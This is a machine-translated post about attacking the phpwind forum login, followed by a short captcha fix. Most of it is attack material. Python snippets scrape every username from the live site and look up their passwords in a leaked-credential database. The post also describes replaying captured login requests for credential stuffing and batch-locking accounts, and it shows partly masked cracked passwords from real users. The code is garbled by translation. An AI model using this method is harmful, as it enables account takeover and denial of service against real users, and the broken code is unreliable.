Phpwind logon can hit a database to lock others' accounts and Solutions

Phpwind logon can hit a database to lock others' accounts and Solutions

Phpwind can hit the database at login (demonstration on the official website)
As well as locking others' accounts, continuous (batch locking is not very good, not tested .....)

The verification code can also be bypassed.

How to use the black box test.



1.

We will extract the users of all accounts first.

The Code is as follows:

Def get (uid): con = urllib2.urlopen ("http://www.phpwind.net/index.php? M = space & uid = "+ str (uid )). read () r = re. compile ('<title> (\ S +) personal space') return r. findall (con)

2.

Create an interface for the social engineering database to extract the password based on the user name.

def getpass(name):con=urllib2.urlopen("http://192.168.1.117/xxx.php?so="+name).read()r=re.compile('<td width="27%">(\S{1,16})</td>')return r.findall(con)

3.

After that, we can talk about how to hit the database.

On the logon page.

Http://www.phpwind.net/index.php? M = u & c = login

Enter the correct verification code, and click logon to capture packets.

Then you can write a script to hit the database.





4.

Let's talk about how to lock accounts in batches.

Take instructions on the official website.

The account on the official website is locked for 30 minutes after six password errors.

We can write a script. That's where the password was cracked. 6 locks.

Then the user cannot log on.

Continue in half an hour ......



Imagine writing a script from id 1 to the end of half an hour (you can check the last id by registering a new account)

The password was cracked six times and then locked.

Loop once every 30 minutes .....

The system tested 1000 IDs and hit dozens of passwords.

Not de-duplicated.

In some accounts, there are more than six passwords in the database, so it is not correct to lock them directly.

So the following data only shows the effect.
 

 

 

 

 

 

* ***** Pass :*****

* *** Pass: * 23 pass * t 18 Pa * pass: 4 * pass: 2 ***** * *** pass: * ********* pass: ************ pass: * 9 pass * 9 pass * pass: 2 * pass: s ********** pass: s ************ pass: * ********** pass: ************* ing pa ************ pass: d *********** pass: * 5 **** * ***** pass: * pass: w ********** pass: w ************* pass: ************ pass: * ********* pass: * ********* 3 pass ************ 3 pass *********** 3 pass **** * ***** pass: * ********* pass: 2*09 pas * 09 pas * pass: * ********* pass: ************* 1 pass *********** pass: * pass: 6 * pass: * ******************* pass: 11 ************ pass: 11 * pass: yo ******************** x pas *********** js pas **** * ****** js pas ************ pass: 9 * pass: 9 * pass: * ********* pass: ************ pass: 5 * pass: 5 ***** * ***** pass *********** pass: * ********* pass: ************ pass: * ********* pass: ************ pass: 1 * pass: * ********* pass: * my pas * pass * y pass ***** * *** pass: mo ********** pass: mo ************* pass: 6 *********** pass: * ********** ind pa ************ ind pa *********** u pass **** * ***** pass: * ********* pass: 2 ************* pass: 1 * n pass *****

 

Solution:

The following content is for reference only.

I think you can write the verification code value in the session,

Then, submit and refresh each time.

Similar to this

If ($ _ SESSION ['seccode'] = '') {print 'verification code is empty '; exit ();} if ($ _ SESSION ['seccode']! = $ Seccode) {$ _ SESSION ['seccode'] = ''; print 'verification code error'; exit ;}